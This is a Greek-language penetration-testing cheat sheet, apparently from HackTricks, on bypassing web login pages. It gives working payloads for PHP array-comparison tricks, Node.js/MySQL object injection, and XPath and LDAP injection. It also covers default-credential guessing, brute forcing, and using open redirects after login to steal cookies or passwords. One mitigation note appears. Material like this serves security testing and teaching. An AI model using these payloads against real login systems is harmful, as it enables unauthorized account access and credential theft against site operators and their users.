Login Bypass

Reading time: 5 minutes

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Παράκαμψη κανονικής σύνδεσης

Αν βρείτε μια σελίδα σύνδεσης, εδώ μπορείτε να βρείτε μερικές τεχνικές για να προσπαθήσετε να την παρακάμψετε:

  • Ελέγξτε για σχόλια μέσα στη σελίδα (κύληση προς τα κάτω και προς τα δεξιά;)
  • Ελέγξτε αν μπορείτε να πρόσβαση απευθείας στις περιορισμένες σελίδες
  • Ελέγξτε να μη στείλετε τις παραμέτρους (μη στείλετε καμία ή μόνο 1)
  • Ελέγξτε το σφάλμα συγκρίσεων PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • Αλλάξτε τον τύπο περιεχομένου σε json και στείλτε τιμές json (συμπεριλαμβανομένου του bool true)
  • Αν λάβετε μια απάντηση που λέει ότι το POST δεν υποστηρίζεται, μπορείτε να προσπαθήσετε να στείλετε το JSON στο σώμα αλλά με αίτημα GET με Content-Type: application/json
  • Ελέγξτε το πιθανό σφάλμα ανάλυσης nodejs (διαβάστε αυτό): password[password]=1
  • Το nodejs θα μετατρέψει αυτό το payload σε ένα ερώτημα παρόμοιο με το εξής: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; το οποίο καθιστά το bit του κωδικού πρόσβασης πάντα αληθές.
  • Αν μπορείτε να στείλετε ένα αντικείμενο JSON, μπορείτε να στείλετε "password":{"password": 1} για να παρακάμψετε τη σύνδεση.
  • Θυμηθείτε ότι για να παρακάμψετε αυτή τη σύνδεση πρέπει ακόμα να γνωρίζετε και να στείλετε ένα έγκυρο όνομα χρήστη.
  • Προσθέτοντας την επιλογή "stringifyObjects":true κατά την κλήση του mysql.createConnection θα μπλοκάρει τελικά όλες τις απροσδόκητες συμπεριφορές όταν το Object περάσει ως παράμετρος.
  • Ελέγξτε τα διαπιστευτήρια:
  • Προεπιλεγμένα διαπιστευτήρια της τεχνολογίας/πλατφόρμας που χρησιμοποιείται
  • Κοινές συνδυασμοί (root, admin, password, όνομα της τεχνολογίας, προεπιλεγμένος χρήστης με έναν από αυτούς τους κωδικούς πρόσβασης).
  • Δημιουργήστε ένα λεξικό χρησιμοποιώντας Cewl, προσθέστε το προεπιλεγμένο όνομα χρήστη και κωδικό πρόσβασης (αν υπάρχει) και προσπαθήστε να το σπάσετε χρησιμοποιώντας όλες τις λέξεις ως ονόματα χρήστη και κωδικούς πρόσβασης
  • Brute-force χρησιμοποιώντας ένα μεγαλύτερο λεξικό (Brute force)

SQL Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε τη σύνδεση μέσω SQL injections.

Στην επόμενη σελίδα μπορείτε να βρείτε μια προσαρμοσμένη λίστα για να προσπαθήσετε να παρακάμψετε τη σύνδεση μέσω SQL Injections:

Login bypass List

No SQL Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε τη σύνδεση μέσω No SQL Injections.

Καθώς οι NoSQL Injections απαιτούν να αλλάξετε την τιμή των παραμέτρων, θα χρειαστεί να τις δοκιμάσετε χειροκίνητα.

XPath Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε τη σύνδεση μέσω XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε την είσοδο μέσω LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Θυμήσου Με

Αν η σελίδα έχει λειτουργία "Θυμήσου Με", έλεγξε πώς είναι υλοποιημένη και δες αν μπορείς να την εκμεταλλευτείς για να αναλάβεις άλλους λογαριασμούς.

Ανακατευθύνσεις

Οι σελίδες συνήθως ανακατευθύνουν τους χρήστες μετά την είσοδο, έλεγξε αν μπορείς να αλλάξεις αυτή την ανακατεύθυνση για να προκαλέσεις μια Ανοιχτή Ανακατεύθυνση. Ίσως μπορέσεις να κλέψεις κάποιες πληροφορίες (κωδικούς, cookies...) αν ανακατευθύνεις τον χρήστη στην ιστοσελίδα σου.

Άλλοι Έλεγχοι

  • Έλεγξε αν μπορείς να αριθμήσεις ονόματα χρηστών εκμεταλλευόμενος τη λειτουργία εισόδου.
  • Έλεγξε αν είναι ενεργοποιημένο το αυτόματη συμπλήρωση στις φόρμες κωδικού/ευαίσθητων πληροφοριών εισόδου: <input autocomplete="false">

Αυτόματα Εργαλεία

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks